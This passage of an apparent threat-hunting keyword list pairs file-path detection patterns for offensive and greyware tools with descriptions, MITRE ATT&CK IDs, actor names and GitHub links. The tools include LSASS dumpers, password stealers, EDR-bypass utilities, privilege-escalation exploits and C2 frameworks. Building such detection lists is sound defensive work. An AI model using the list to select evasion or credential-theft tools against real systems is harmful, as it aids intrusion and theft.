- TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*\nmap.exe*/24*,greyware_tool_keyword,nmap,When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. and potential vulnerabilities in target systems.,T1046 - T1065 - T1210.002,TA0002 - TA0007 - TA0008,N/A,N/A,Reconnaissance,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\Nofault.exe*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*\NoFilter.cpp*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,0,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*\NoFilter.exe*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,0,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*\NoFilter.sln*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,0,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*\NoFilter.vcxproj*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,1,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*\nopac.exe*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/ricardojba/noPac,1,0,N/A,N/A,1,34,5,2021-12-19T17:42:12Z,2021-12-13T18:51:31Z -*\NoPowerShell*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*\NoPowerShell.*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*\No-PowerShell.cs*,offensive_tool_keyword,No-powershell,powershell script to C# (no-powershell),T1059.001 - T1027 - T1500,TA0002 - TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs,1,0,N/A,8,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\No-PowerShell.exe*,offensive_tool_keyword,No-powershell,powershell script to C# (no-powershell),T1059.001 - T1027 - T1500,TA0002 - TA0004 - TA0005,N/A,N/A,Defense 
Evasion,https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs,1,0,N/A,8,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\NPPSpy.c*,offensive_tool_keyword,NPPSpy,Simple code for NPLogonNotify(). The function obtains logon data including cleartext password,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy,1,0,N/A,10,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\NPPSPY.dll*,offensive_tool_keyword,NPPSpy,Simple code for NPLogonNotify(). The function obtains logon data including cleartext password,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy,1,0,N/A,10,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\NPPSpy.exe*,offensive_tool_keyword,NPPSpy,Simple code for NPLogonNotify(). The function obtains logon data including cleartext password,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy,1,0,N/A,10,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\NPPSpy.txt*,offensive_tool_keyword,NPPSpy,Simple code for NPLogonNotify(). 
The function obtains logon data including cleartext password,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy,1,0,N/A,10,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\ntdlll-unhooking-collection*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,0,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z -*\ntdlol.txt*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*\ntlm.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*\NTLMRelay2Self*,offensive_tool_keyword,NTLMRelay2Self,An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).,T1078 - T1078.004 - T1557 - T1557.001 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/med0x2e/NTLMRelay2Self,1,0,N/A,10,4,349,45,2022-04-30T19:02:06Z,2022-04-30T10:05:02Z -*\ntlmutil.py*,offensive_tool_keyword,NTMLRecon,Enumerate information from NTLM authentication enabled web endpoints,T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001,TA0009 - TA0007 - TA0006,N/A,N/A,Discovery,https://github.com/puzzlepeaches/NTLMRecon,1,0,N/A,8,1,32,3,2023-08-16T14:34:10Z,2023-08-09T12:10:42Z -*\NtoskrnlOffsets.csv*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*\NtRemoteLoad.sln*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,0,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z -*\NtRights\*,offensive_tool_keyword,NtRights,tool for adding privileges from the commandline,T1548.002 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/gtworek/PSBits/tree/master/NtRights,1,1,N/A,7,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z 
-*\Nuages_Cli*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*\obfy-1.0.zip*,offensive_tool_keyword,obfy,A tiny C++ obfuscation framework,T1027 - T1064 - T1140,TA0005 - TA0042,N/A,N/A,Defense Evasion,https://github.com/fritzone/obfy,1,1,N/A,N/A,6,537,122,2020-06-10T13:28:32Z,2015-11-13T13:28:23Z -*\OffensiveCSharp\*,offensive_tool_keyword,OffensiveCSharp,Collection of Offensive C# Tooling,T1059.001 - T1055.001 - T1027,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*\out_pe.exe*,offensive_tool_keyword,PE-Obfuscator,PE obfuscator with Evasion in mind,T1027 - T1055 - T1140 - T1564.003 - T1027.002,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/PE-Obfuscator,1,0,N/A,N/A,2,196,38,2023-04-25T04:58:12Z,2023-04-25T04:00:15Z -*\padre\pkg\exploit*,offensive_tool_keyword,padre,padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption,T1203 - T1059.003 - T1027.002,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/glebarez/padre,1,0,N/A,8,2,178,19,2023-09-25T19:11:44Z,2019-12-30T13:52:03Z -*\papacat.ps1*,offensive_tool_keyword,JustEvadeBro,JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.,T1562.001 - T1055.012 - T1218.011,TA0005 - TA0040 - TA0010,N/A,N/A,Defense Evasion,https://github.com/sinfulz/JustEvadeBro,1,0,N/A,8,3,260,25,2023-03-30T06:22:24Z,2021-05-11T06:26:10Z -*\papacat.zip*,offensive_tool_keyword,JustEvadeBro,JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.,T1562.001 - T1055.012 - T1218.011,TA0005 - TA0040 - TA0010,N/A,N/A,Defense 
Evasion,https://github.com/sinfulz/JustEvadeBro,1,0,N/A,8,3,260,25,2023-03-30T06:22:24Z,2021-05-11T06:26:10Z -*\ParsedMalleableData.txt*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,0,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*\password.lst*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*\Passwordfiles.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*\PatchingAPI.cpp*,offensive_tool_keyword,UnhookingPatch,Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime,T1055 - T1055.001 - T1070 - T1070.004 - T1211,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/UnhookingPatch,1,0,N/A,9,3,259,43,2023-08-02T02:25:38Z,2023-02-08T16:21:03Z -*\PatchingAPI.exe*,offensive_tool_keyword,UnhookingPatch,Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime,T1055 - T1055.001 - T1070 - T1070.004 - T1211,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/UnhookingPatch,1,0,N/A,9,3,259,43,2023-08-02T02:25:38Z,2023-02-08T16:21:03Z -*\payloadtests.py*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - 
TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*\PEASS-ng*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,0,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*\PerfExec.exe*,offensive_tool_keyword,PerfExec,PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.,T1055.001 - T1059.001 - T1059.003 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/PerfExec,1,0,N/A,7,1,73,8,2023-08-02T20:53:24Z,2023-07-11T16:43:47Z -*\Persistence.cpp*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*\Persistence.exe*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*\pipe\brutepipe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*\PipeViewer.exe*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed 
information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,1,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*\PipeViewer.sln*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,0,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*\PipeViewer\Program.cs*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,0,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*\PoC\PrivilegeEscalation*,offensive_tool_keyword,echoac-poc,poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/kite03/echoac-poc,1,0,N/A,8,2,118,25,2023-08-03T04:09:38Z,2023-06-28T00:52:22Z -*\POC_DLL.vcxproj*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,0,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*\polenum.py*,offensive_tool_keyword,polenum,Uses Impacket Library to get the password policy from a windows machine,T1012 - T1596,TA0009 - TA0007,N/A,N/A,Discovery,https://salsa.debian.org/pkg-security-team/polenum,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*\portbender.*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 
- T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,0,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*\PoshC2*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*\PostDump.exe*,offensive_tool_keyword,POSTDump,perform minidump of LSASS process using few technics to avoid detection.,T1003.001 - T1055 - T1564.001,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/YOLOP0wn/POSTDump,1,0,N/A,10,2,172,21,2023-09-15T11:24:50Z,2023-09-13T11:28:51Z 
-*\powerfun.ps1*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*\powerglot\*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\Powermad*,offensive_tool_keyword,Powermad,PowerShell MachineAccountQuota and DNS exploit tools,T1087 - T1098 - T1018 - T1046 - T1081,TA0007 - TA0006 - TA0005 - TA0001,N/A,N/A,POST Exploitation tools,https://github.com/Kevin-Robertson/Powermad,1,0,N/A,N/A,10,1021,171,2023-01-11T00:48:35Z,2017-09-05T18:34:03Z -*\power-pwn\*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation 
tools,https://github.com/mbrg/power-pwn,1,0,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*\powershell.exe* += hidden*,greyware_tool_keyword,powershell,command aiming to hide a file. It can be performed with powershell on a WINDOWS machine with command option =hidden,T1562.002,TA0040 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\powershell.exe* +=hidden*,greyware_tool_keyword,powershell,command aiming to hide a file. It can be performed with powershell on a WINDOWS machine with command option =hidden,T1562.002,TA0040 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\powershell.exe* = hidden*,greyware_tool_keyword,powershell,command aiming to hide a file. It can be performed with powershell on a WINDOWS machine with command option =hidden,T1562.002,TA0040 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\powershell.exe* =hidden*,greyware_tool_keyword,powershell,command aiming to hide a file. It can be performed with powershell on a WINDOWS machine with command option =hidden,T1562.002,TA0040 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\PowershellKerberos*,offensive_tool_keyword,PowershellKerberos,Some scripts to abuse kerberos using Powershell,T1558.003 - T1558.004 - T1059.001,TA0006 - TA0002,N/A,N/A,Exploitation Tools,https://github.com/MzHmO/PowershellKerberos,1,0,N/A,9,3,262,37,2023-07-27T09:53:47Z,2023-04-22T19:16:52Z -*\powerup.exe*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*\Powerup.exe*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*\PowerUp.ps1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*\PowerView.cna*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik 
Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,0,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*\PowerView.exe*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,0,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*\Powerview.exe*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*\PowerView.ps1*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
